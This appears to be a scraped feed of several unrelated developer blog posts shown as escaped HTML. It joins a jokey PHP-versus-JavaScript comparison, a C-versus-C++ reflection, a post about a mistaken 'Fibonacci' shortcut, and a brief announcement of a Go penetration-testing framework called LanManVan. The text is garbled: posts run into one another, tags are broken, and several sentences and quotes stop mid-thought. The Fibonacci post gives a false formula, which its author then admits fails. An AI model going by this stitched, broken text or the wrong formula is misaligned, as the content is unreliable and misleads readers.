&lt;p&gt;A few years ago, if you told me I'd eventually enjoy writing PHP more than JavaScript, I would've laughed.&lt;/p&gt;

&lt;p&gt;Then I spent more time working with both.&lt;/p&gt;

&lt;p&gt;Now here we are.&lt;/p&gt;

  PHP Just Wants To Build Websites
&lt;/h2&gt;

&lt;p&gt;PHP knows exactly what it is.&lt;/p&gt;

&lt;p&gt;It's not trying to become an operating system.&lt;/p&gt;

&lt;p&gt;It's not trying to become a game engine.&lt;/p&gt;

&lt;p&gt;It's not trying to run on my toaster.&lt;/p&gt;

&lt;p&gt;PHP wakes up every morning and says:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Need a website?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;And that's pretty much it.&lt;/p&gt;

&lt;p&gt;I respect that.&lt;/p&gt;

  JavaScript Has Main Character Syndrome
&lt;/h2&gt;

&lt;p&gt;I swear JavaScript cannot sit still.&lt;/p&gt;

&lt;p&gt;Originally it was supposed to make buttons do funny things when you clicked them.&lt;/p&gt;

&lt;p&gt;That was the job.&lt;/p&gt;

&lt;p&gt;That was literally the whole job.&lt;/p&gt;

&lt;p&gt;Then somebody decided:&lt;/p&gt;

&lt;p&gt;"What if we run JavaScript on the server?"&lt;/p&gt;
&lt;/blockquote&gt;

  PHP Lets Me Get Stuff Done

&lt;p&gt;This is probably the biggest reason.&lt;/p&gt;

&lt;p&gt;When I'm writing PHP, I feel like I'm solving my actual problem.&lt;/p&gt;

&lt;p&gt;When I'm writing modern JavaScript, I sometimes feel like I'm solving JavaScript.&lt;/p&gt;

&lt;p&gt;There's a difference.&lt;/p&gt;

  The Dependency Situation Is Crazy
&lt;/h2&gt;

&lt;p&gt;I once cloned a JavaScript project.&lt;/p&gt;

  JavaScript Changes Every Five Minutes

&lt;p&gt;Every time I come back to JavaScript after a few months, I feel like I skipped three seasons of a TV show.&lt;/p&gt;

&lt;p&gt;People are suddenly using a new framework.&lt;/p&gt;

&lt;p&gt;Half the syntax looks different.&lt;/p&gt;

&lt;p&gt;The recommended architecture changed.&lt;/p&gt;

&lt;p&gt;The cool thing from last year is now apparently bad.&lt;/p&gt;

  The Funny Thing About PHP

&lt;p&gt;And yet somehow PHP keeps showing up to work.&lt;/p&gt;

&lt;p&gt;At this point PHP is basically that office employee who's survived six management changes and somehow still has the same desk.&lt;/p&gt;

  Final Thoughts

&lt;p&gt;PHP isn't perfect.&lt;/p&gt;

&lt;p&gt;JavaScript isn't terrible.&lt;/p&gt;

&lt;p&gt;But when I need to build a website quickly, connect a database, and get something online without summoning the entire modern frontend ecosystem...&lt;/p&gt;

&lt;p&gt;I still find PHP refreshingly simple.&lt;/p&gt;

&lt;p&gt;Maybe I'm getting old.&lt;/p&gt;

&lt;p&gt;Maybe PHP got better.&lt;/p&gt;

&lt;p&gt;Maybe JavaScript got too complicated.&lt;/p&gt;

&lt;p&gt;Or maybe I just enjoy technologies that let me spend more time building things and less time reading build-tool documentation.&lt;/p&gt;

&lt;p&gt;Either way...&lt;/p&gt;

&lt;p&gt;PHP still deserves way more respect than it gets.&lt;/p&gt;

&lt;p&gt;Now excuse me while I open a JavaScript project and download approximately 8 billion dependencies.&lt;/p&gt;

  C Is Honest

&lt;p&gt;One thing I love about C is that it never pretends to protect me.&lt;/p&gt;

&lt;p&gt;If I allocate 8 bytes and write 16 bytes?&lt;/p&gt;

&lt;p&gt;Boom.&lt;/p&gt;

&lt;p&gt;If I dereference a bad pointer?&lt;/p&gt;

&lt;p&gt;Boom.&lt;/p&gt;

&lt;p&gt;If I forget to free memory?&lt;/p&gt;

&lt;p&gt;Boom (eventually).&lt;/p&gt;

&lt;p&gt;But here's the important part:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;I know exactly why I got cooked.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The language didn't hide anything from me.&lt;/p&gt;

&lt;p&gt;C basically says:&lt;/p&gt;

&lt;p&gt;I started using Visual C++.&lt;/p&gt;

&lt;p&gt;The gigantic Microsoft ecosystem.&lt;/p&gt;

&lt;p&gt;The IDE.&lt;br&gt;
The project files.&lt;br&gt;

&lt;p&gt;Eventually I found myself spending more time fighting tools than writing software.&lt;/p&gt;

  "My 2-Week-Old Language Looks Better Than C++"

&lt;p&gt;Every language creator eventually reaches this stage.&lt;/p&gt;

&lt;p&gt;You build a parser.&lt;/p&gt;

&lt;p&gt;You implement variables.&lt;/p&gt;

&lt;p&gt;You add functions.&lt;/p&gt;

&lt;p&gt;Suddenly you look at C++ and think:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Wait... why is my weekend project easier to understand than this?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The answer is simple:&lt;/p&gt;

&lt;p&gt;Because your language has 2 weeks of features.&lt;/p&gt;

&lt;p&gt;C++ has decades of accumulated requirements, backwards compatibility, performance constraints, and competing design goals.&lt;/p&gt;

&lt;p&gt;But that doesn't make your observation wrong.&lt;/p&gt;

&lt;p&gt;It just means complexity accumulates.&lt;/p&gt;

  The Biggest Difference

  C programmers know when they're about to get cooked.

&lt;p&gt;You see the manual memory management.&lt;/p&gt;

&lt;p&gt;You see the danger signs.&lt;/p&gt;

  C++ programmers sometimes get cooked by surprise.
&lt;/h3&gt;

&lt;p&gt;Maybe it's an iterator invalidation issue.&lt;/p&gt;

&lt;p&gt;Maybe it's object lifetime.&lt;/p&gt;

&lt;p&gt;Maybe it's template deduction.&lt;/p&gt;

&lt;p&gt;Maybe it's some abstraction hiding three layers of complexity underneath.&lt;/p&gt;

&lt;p&gt;The fire arrives later.&lt;/p&gt;

&lt;p&gt;And often faster than expected.&lt;/p&gt;

&lt;p&gt;C is not perfect.&lt;/p&gt;

&lt;p&gt;C++ is not bad.&lt;/p&gt;

&lt;p&gt;Rust is not magic.&lt;/p&gt;

&lt;p&gt;Every language has trade-offs.&lt;/p&gt;

&lt;p&gt;But after all these years, C still gives me something many modern languages don't:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Predictability.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When things break, I usually know where to start looking.&lt;/p&gt;

&lt;p&gt;And sometimes that's worth more than a thousand language features.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Now excuse me while I spend three hours debugging a segfault caused by my own pointer arithmetic.&lt;/strong&gt;&lt;/p&gt;

  Did I Just Accidentally Beat Fibonacci?

&lt;li&gt;&lt;p&gt;Ok so, yesterday I was brain storming some algorithms and suddendly a spark in my stupid brain lurked(somewhat), I accidentlly invented a new AND BETTER fib algo!&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;So here it goes:&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;fib is what: addition of all numbers from 1..n. (whats what i thought LOL)&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So why not just: &lt;code&gt;(n+1) * (n/2)&lt;/code&gt; if n is even? and &lt;code&gt;n * (n/2)&lt;/code&gt; when odd? BOY I WAS HAPPY!&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;And I tested the fib of 10, and it printed 55, VOILA!&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I tested it some other algos, and it was faster the nthe fastest one by &lt;code&gt;1,200,000%&lt;/code&gt;, and yep then it hit me!&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;it only computes fib of some numbers and not others!&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now i am sad! AAHAHAHAHAHAHHHHHH&lt;/p&gt;

&lt;p&gt;A few months ago, I started working on a personal project to create a flexible and powerful tool for security research and penetration testing. I wanted something inspired by Metasploit — an interactive framework where I could easily load, manage, and run different modules without dealing with heavy dependencies or complex setups.&lt;/p&gt;

&lt;p&gt;At first, I considered building it in Python (like many similar tools), but then I chose Go. Why? Go offers incredible performance, seamless cross-compilation, single binary output, and amazing concurrency support — all perfect for a CLI tool that needs to feel snappy and reliable, even when running multiple tasks or handling modules efficiently.&lt;/p&gt;

&lt;p&gt;And so, &lt;strong&gt;LanManVan&lt;/strong&gt; was born — and now it's ready for YOU to use!&lt;/p&gt;

&lt;p&gt;Since the initial release, we've added dynamic module installation from GitHub repos, a standalone Python module manager (&lt;code&gt;lmv_module&lt;/code&gt;), and the &lt;strong&gt;basic81 pack&lt;/strong&gt; with &lt;strong&gt;over 80 battle-tested modules&lt;/strong&gt; for recon, web testing, network attacks, encoding/decoding, and more.&lt;/p&gt;
